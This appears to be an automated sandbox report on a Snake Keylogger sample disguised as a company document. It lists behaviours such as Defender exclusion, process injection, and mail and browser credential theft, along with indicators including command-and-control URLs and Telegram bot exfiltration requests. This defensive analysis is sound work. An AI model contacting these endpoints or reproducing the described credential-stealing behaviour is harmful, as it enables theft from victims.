                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 4820, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    11
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    1
                    Web Service
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    11
                    Disable or Modify Tools
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    31
                    Virtualization/Sandbox Evasion
                    Security Account Manager31
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    System Network Configuration Discovery
                    SSHKeylogging14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Software Packing
                    DCSync13
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501092 Sample: Autofill Manufacturing Sdn ... Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 2 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 68 13 other signatures 2->68 8 Autofill Manufacturing Sdn Bhd 28-08-2024.exe 7 2->8         started        12 GhrKoSGuCdvpJ.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...behaviorgraphhrKoSGuCdvpJ.exe, PE32 8->38 dropped 40 C:\...behaviorgraphhrKoSGuCdvpJ.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp8289.tmp, XML 8->42 dropped 44 Autofill Manufactu... 28-08-2024.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 Autofill Manufacturing Sdn Bhd 28-08-2024.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 24 GhrKoSGuCdvpJ.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49742, 49746 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.97.3, 443, 49707, 49710 CLOUDFLARENETUS European Union 14->54 56 checkip.dyndns.com 193.122.6.168, 49706, 49711, 49712 ORACLE-BMC-31898US United States 14->56 78 Loading BitLocker PowerShell Module 18->78 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 36 conhost.exe 26->36         started        signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Autofill Manufacturing Sdn Bhd 28-08-2024.exe61%VirustotalBrowse
                    Autofill Manufacturing Sdn Bhd 28-08-2024.exe58%ReversingLabsWin32.Spyware.Snakekeylogger
                    Autofill Manufacturing Sdn Bhd 28-08-2024.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe58%ReversingLabsWin32.Spyware.Snakekeylogger
                    C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe61%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    reallyfreegeoip.org0%VirustotalBrowse
                    api.telegram.org2%VirustotalBrowse
                    checkip.dyndns.com0%VirustotalBrowse
                    checkip.dyndns.org0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://varders.kozow.com:80810%URL Reputationsafe
                    http://aborters.duckdns.org:8081100%URL Reputationmalware
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                    http://anotherarmy.dns.army:8081100%URL Reputationmalware
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    https://api.telegram.org1%VirustotalBrowse
                    https://www.office.com/0%VirustotalBrowse
                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                    https://www.office.com/lB0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=enp0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                    https://www.office.com/lB0%VirustotalBrowse
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://www.office.com/p0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%VirustotalBrowse
                    https://api.telegram.org/bot1%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                    https://www.office.com/p0%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    188.114.97.3
                    truetrueunknown
                    api.telegram.org
                    149.154.167.220
                    truetrueunknown
                    checkip.dyndns.com
                    193.122.6.168
                    truefalseunknown
                    checkip.dyndns.org
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://checkip.dyndns.org/false
                    • URL Reputation: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.office.com/GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000333C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/chrome_newtabAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/ac/?q=Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.orgAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.org/botAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.office.com/lBAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://chrome.google.com/webstore?hl=enpAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ECF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://checkip.dyndns.orgAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://chrome.google.com/webstore?hl=enGhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033AE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.ecosia.org/newtab/Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://varders.kozow.com:8081Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20aAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://aborters.duckdns.org:8081Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://ac.ecosia.org/autocomplete?q=Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33$Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.office.com/pAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F00000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://anotherarmy.dns.army:8081Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.org/qAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://chrome.google.com/webstore?hl=enlBAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://reallyfreegeoip.orgAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024A9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 0000000C.00000002.1319580024.000000000328E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedAutofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.org/xml/Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    149.154.167.220
                    api.telegram.orgUnited Kingdom
                    62041TELEGRAMRUtrue
                    188.114.97.3
                    reallyfreegeoip.orgEuropean Union
                    13335CLOUDFLARENETUStrue
                    193.122.6.168
                    checkip.dyndns.comUnited States
                    31898ORACLE-BMC-31898USfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1501092
                    Start date and time:2024-08-29 12:15:22 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 20s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:25
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@19/15@3/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 192
                    • Number of non-executed functions: 25
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    TimeTypeDescription
                    06:16:11API Interceptor8529627x Sleep call for process: Autofill Manufacturing Sdn Bhd 28-08-2024.exe modified
                    06:16:13API Interceptor27x Sleep call for process: powershell.exe modified
                    06:16:16API Interceptor5980865x Sleep call for process: GhrKoSGuCdvpJ.exe modified
                    12:16:13Task SchedulerRun new task: GhrKoSGuCdvpJ path: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    149.154.167.2208468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                      SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exeGet hashmaliciousAgentTeslaBrowse
                        172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            RFQ-MR-24-09101 SPS.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                SecuriteInfo.com.W64.ABRisk.KSAB-7665.26815.23633.exeGet hashmaliciousBlank GrabberBrowse
                                  1C24TDH_00017388.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                    df24c9ca-d50b-c720-84ed-638e99f68d75.emlGet hashmaliciousSnake KeyloggerBrowse
                                      18__ e_t___s#U00b5__ 2,6_ G___F____ _._.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        188.114.97.3Document_pdf.exeGet hashmaliciousFormBookBrowse
                                        • www.x0x9x8x8x7x6.shop/dscg/
                                        QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
                                        • filetransfer.io/data-package/zbi9vNYx/download
                                        z1209627360293827.exeGet hashmaliciousDBatLoader, FormBookBrowse
